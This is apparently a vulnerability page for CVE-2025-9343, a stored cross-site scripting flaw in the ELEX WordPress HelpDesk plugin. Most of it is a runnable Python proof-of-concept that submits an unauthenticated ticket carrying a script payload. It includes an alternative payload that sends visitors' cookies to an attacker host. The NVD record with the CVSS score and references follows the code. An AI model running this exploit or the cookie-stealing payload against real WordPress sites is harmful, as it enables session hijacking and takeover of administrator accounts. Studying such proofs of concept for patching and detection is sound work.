CVE-2025-9343

import requests import re # CVE-2025-9343 PoC - Stored XSS in ELEX WordPress HelpDesk Plugin # Target: WordPress site with ELEX HelpDesk plugin <= 3.3.4 TARGET_URL = "http://target-wordpress-site.com" XSS_PAYLOAD = '<script>alert(document.domain)</script>' # Alternative payload using img onerror ALT_PAYLOAD = '<img src=x onerror=fetch("https://attacker.com/log?c="+document.cookie)>' def submit_ticket_with_xss(): """ Submit a ticket with malicious XSS payload in subject field. This PoC demonstrates how an unauthenticated attacker can inject arbitrary JavaScript through the ticket subject field. """ # Target the ticket submission endpoint ticket_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Prepare the ticket submission data data = { 'action': 'whd_submit_ticket', 'subject': XSS_PAYLOAD, # XSS payload in subject field 'message': 'Test ticket message for vulnerability verification', 'email': '[email protected]', 'name': 'Attacker' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.post(ticket_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Ticket submitted with XSS payload") print(f"[+] Payload: {XSS_PAYLOAD}") print(f"[+] When admin views ticket, XSS will execute") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-9343 PoC - ELEX HelpDesk Stored XSS") print("=" * 50) submit_ticket_with_xss()

{"cve": {"id": "CVE-2025-9343", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:05.670", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ticket subjects in all versions up to, and including, 3.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3420695%40elex-helpdesk-customer-support-ticket-system&new=3420695%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/042d9bc7-50ea-4585-9789-b10ed40b0d14?source=cve", "source": "[email protected]"}]}}